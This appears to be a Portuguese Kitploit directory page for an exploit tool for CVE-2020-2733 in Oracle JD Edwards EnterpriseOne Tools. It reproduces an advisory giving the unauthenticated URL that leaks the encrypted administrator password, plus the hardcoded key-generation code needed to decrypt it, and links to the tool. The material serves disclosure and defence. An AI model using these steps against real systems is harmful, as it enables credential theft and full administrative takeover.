Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-2733 | Kitploit
Ferramentas/GitHubGitHub/anmolksachan/cve-2020-2733
Ferramentas de Criptografia/DescriptografiaAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoConfiguração Incorreta
GitHubanmolksachan/cve-2020-2733

CVE-2020-2733

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-2733 - senha de administrador do JD Edwards EnterpriseOne Tools não adequadamente protegida

image
Pic 1: Descriptografar a string
image
Pic 2: Descriptografar fornecendo a URL

[CVE-2020-2733]

Aplicação: JD Edwards EnterpriseOne Tools
Versões Afetadas: JD Edwards EnterpriseOne Tools 9.2
URL do fornecedor: https://oracle.com/
Bug: Divulgação de informações
Relatado: 18 de setembro de 2019
Data do aviso público: 23 de agosto de 2022
Referência: [https://www.oracle.com/security-alerts/cpuapr2020.html, https://redrays.io/cve-2020-2733-jd-edwards/]
Template Nuclei para detecção: https://github.com/projectdiscovery/nuclei-templates/blob/68f0ad5fa2f54a08959e2d68633174750fcb4952/http/cves/2020/CVE-2020-2733.yaml#L2

Descrição

INFORMAÇÕES DO AVISO
Título: [CVE-2020-2733] Senha do administrador do JD Edwards EnterpriseOne Tools não adequadamente protegida
Risco: Crítico
URL do aviso: https://redrays.io/cve-2020-6369-patch-bypass/
Data de publicação: 23.08.2022

INFORMAÇÕES DA VULNERABILIDADE


Explorável remotamente: Sim
Explorável localmente: Não


Informações CVSS : Pontuação base CVSS v3.1: 9.8 / 10 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

DESCRIÇÃO DA VULNERABILIDADE

O JD Edwards EnterpriseOne Tools 9.2 ou versões anteriores permitem que atacantes não autenticados contornem a autenticação e obtenham direitos de administrador no sistema.

DESCRIÇÃO TÉCNICA

A vulnerabilidade foi descoberta no portal de gerenciamento Oracle JD Edwards. Para reproduzir a vulnerabilidade, você precisa abrir (sem autenticação) a seguinte URL

http://JDEdwards:8999/manage/fileDownloader?sec=1

Ao abrir a URL, você pode ver texto pseudoaleatório na página. unnamed-2-e1661254647723

root@kitploit:~
ACHCJKGJHCJKBLLALOLOJFCABEFHOALDDAOFNGGANPDB


Após analisar os arquivos jar do JD Edwards, descobrimos que esses dados pseudoaleatórios são – A SENHA DE ADMINISTRADOR CRIPTOGRAFADA!

As chaves de criptografia estão localizadas na seguinte função

root@kitploit:~
private static void genKeys(byte[] paramArrayOfByte1, byte[] paramArrayOfByte2, byte paramByte)
{
int i = 0;
byte[] arrayOfByte1 = { 65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46 };
byte[] arrayOfByte2 = { 107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, Byte.MAX_VALUE, 77, 54 };
byte[] arrayOfByte3 = { 36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56 };
int j = paramByte >> 4;
int k = paramByte & 0xF;
int m = arrayOfByte3[j];
for (i = 0; i < 16; i++) {
paramArrayOfByte1[i] = ((byte)(arrayOfByte1[i] ^ m));
}
m = arrayOfByte3[k];
for (i = 0; i < 16; i++) {
paramArrayOfByte2[i] = ((byte)(arrayOfByte2[i] ^ m));
}
}

Como resultado, você obterá uma senha de administrador e poderá implantar qualquer aplicativo no portal JD Edwards. image

Referência/Crédito: https://redrays.io/blog/cve-2020-2733-jd-edwards/

Baixar ferramenta